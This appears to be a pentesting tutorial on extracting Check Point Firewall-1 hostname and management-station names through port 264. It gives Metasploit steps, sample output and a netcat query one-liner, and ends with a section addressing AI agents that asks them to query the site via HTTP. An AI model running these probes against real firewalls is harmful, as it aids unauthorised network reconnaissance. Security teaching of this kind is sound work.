# Check Point Firewall - Port 264

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}
Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**

* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
  {% endtab %}
  {% endtabs %}

## Basic info

CheckPoint Firewall-1 is a widely used firewall solution, but certain configurations allow attackers to extract valuable information about the firewall and its management station. This article will demonstrate how an attacker can leverage port **264/TCP** to obtain critical details using publicly available tools and commands.

CheckPoint Firewall-1 includes a **SecuRemote Topology service** running on **port 264/TCP**, which allows unauthenticated queries. By interacting with this service, attackers can retrieve the **firewall's hostname** and the **SmartCenter management station's name**—potentially leading to further attacks.

The ability to obtain these details is particularly dangerous because it helps attackers map the network infrastructure, identify targets for further exploitation, and develop customized phishing attacks.

***

## Exploiting CheckPoint Firewall-1 with Metasploit

Metasploit provides a module that can interact with the firewall to extract its **hostname** and **management station name**.

#### Step 1: Load the Metasploit Module

Open **Metasploit** and load the auxiliary module:

```
use auxiliary/gather/checkpoint_hostname
```

#### Step 2: Set Target IP Address

Set the **RHOST** parameter to the target CheckPoint Firewall-1 instance:

```
set RHOST 10.10.10.10
```

#### Step 3: Execute the Module

Run the module to interact with the firewall:

```
run
```

If the firewall is vulnerable, the module will successfully contact the SecuRemote Topology service and return output similar to:

```
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed
```

This confirms the presence of the firewall and exposes its internal naming conventions.

***

## Alternative Method: Extracting Hostname and ICA Name Manually

If Metasploit is unavailable, a direct **Netcat** command can be used to query the firewall:

#### Step 1: Send Query via Netcat

```
printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-
```

#### Step 2: Analyze the Output

A successful query returns the firewall’s **certificate name (CN)** and **organization (O)**:

```
CN=Panama,O=MGMTT.srv.rxfrmi
```

These values can be used to gain insights into the firewall’s identity and administrative domains.

***

{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://shop.verylazytech.com/)

<details>

<summary>Support VeryLazyTech 🎉</summary>

Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**

* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚

</details>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/network-pentesting/check-point-firewall-port-264.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.